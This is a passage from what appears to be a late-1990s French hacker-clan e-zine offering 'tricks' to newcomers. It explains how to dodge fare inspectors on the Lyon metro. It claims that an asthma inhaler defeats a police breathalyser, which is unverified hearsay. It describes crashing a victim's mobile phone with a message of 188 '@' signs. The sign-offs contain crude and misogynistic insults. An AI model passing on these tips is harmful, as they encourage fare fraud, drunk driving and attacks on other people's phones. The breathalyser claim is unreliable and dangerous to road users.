reveiller. ---->7/FRODER LE METRO LYONNAIS. Bon, cette technik n'est applikable que sur le metro lyonnais, sur la ligne A direction perrache. OK, tu ne prend que la ligne A et t'a pas envie de payer ton retour a perrache. newbie "oui, mais a perrache, C toujours bourer de controleur" Exact, et voila la technik pour les finter (si tu la connait pas deja). donc, je t'esplik! quand tu arrive a perrache tu entend une salope qui dit "perrache, terminus, tous les voyageur dessende de voiture" tu entre dans la station, et la que voit tu arrg, plein de controleur. merde! Mais tu remarkeras que le fireWall des controleur est tres vulnerable. effectivemment, ces salaud on 2 point strategique pour te faire cracker ta tunasse. soit il sont vers les escalier, soit il bloque l'endroi ou y'a le poteau. quand les controleur sont vers les escalier, il sont deborder, vue le pipole qui bombe comme des marteau pour pas louper leur train! donc toi tu en profite pour t'esciver sur la sorti de droite au lieu de prendre les escalier. quand les controleur sont au poteau! C plus dificile car C a cette endroi que le passage ce retreci! et C la que ses con te bloque. donc il fo prevoir le coup a l'avance! effectivemment la technik consiste a ce mettre dans le Premier vagon qui est toujours eppargner par cette technik de control. bon, si vraimment t'a pas de bol, et que y'a 50 controleur qui bloque toute les issu avec des militaire, ben il fo pratiquer le HustlinG. tu te planque bien dans le vagon, et tu attend que le metro reparte dans l'otre sens (Tester et approuver). biensur, si les contoleur monte a cordelier ou a ampere, t'a plus qu'a conter sur ta bonne etoile. ---->7/FINTER LES ALOTEST je tient a dire que je ne suis pas partisans des gens qui conduise bourrer mais sa fait chier quan t'a bu une petite sunrize et que les poulet t'attende pour un ALCOTEST Donc, voila le truc (jlais pas tester, mais mon couzin me dit que sa marche) Il fo avoir dans sa caisse un tube pour les asmatique, tu sais, le truc qui fait pchit. et des que tu vois les poulet, tu en prent un ou 2. ce truc a pour effet 1. il te donne plus de souffle 2. de rafraichir l'alaine donc, tu passe l'alcotest tranquille. ---->9/COMMENT KUTER UN PHONE PORTABLE Pour finir en beauter, il parait que certain telephone portable contienne un BUG. Effectivemment, si vous envoyer a votre victime un message contenant 188 arobase (@) sur son phone, celui si ne pourat plus l'effacer. voici ce qui se passe exactemment: quand la victime alume son Phone, un voyant rouge clignote lui indiquant qu'il a recu un message, celui si le consulte, appui sur suppr, le phone demande d'appuyer sur OK, et quand il appuye dessus, le phone s'eteint. C'ETAIT LES QUELQUE PETIT TRUC POURIT HISTOIRE DE DIRE DE BIEN FINIR! PS: si vous desirer un article plus detailler sur l'un de ces truc, mail me to ThreaT@Caramail.com l'artcile paraitra dans M*V*M II, qui sortiras dans tres tres longutemps (cette ete peut etre) --->FIN<--- LES MOTS DE LA FIN ------------------ Voila, notre 1er Zines est fini! si celui si a appris 1 chose a 1 personne nous aurons reussi notre mission qui est d'essayer d'appendre un miximum au newbiez d'aujourd'hui, qui, comme le dit si bien norace, sont l'elite de demain. celui si est le premier zine! nous l'avons ecrit pour preparer le terrain. mais nous attakerons des sujet plus interresant dans le 2eme comme COMMENT TROUVER DES OUTDIAL? LES FONCTION DE LINUX HACK WITH IP SPOOFING HACK DU CABLE (suite) ETC... (Si on est toujours la) **************************************************************************** --- Mobilisation * Virtuelle * Minoritaire --- Pour que notre minoriter devienne une majoriter dans un monde de lamerositer **************************************************************************** ThreaT: "La prison me guette! mais j'espere que QQ1 arriveras a faire changer "ce monde de Lame" Bolliop: "Faite avancer la scene francaise merde" Angus: "FT nous encule, Alors enconlons FT" DamsKiller: "Je veut une feeemmmee!) Maverick: "Putain! TOUTES DES SALOPES" DreaD: "arrete CoqS! melange pas ses 2 produit aarrrggg...." CoqS: "C bon, je sais ce que je fais..." BOOOOOOMMMM *~#'& NO Carrier --- M * V * M --- Hackers C l a n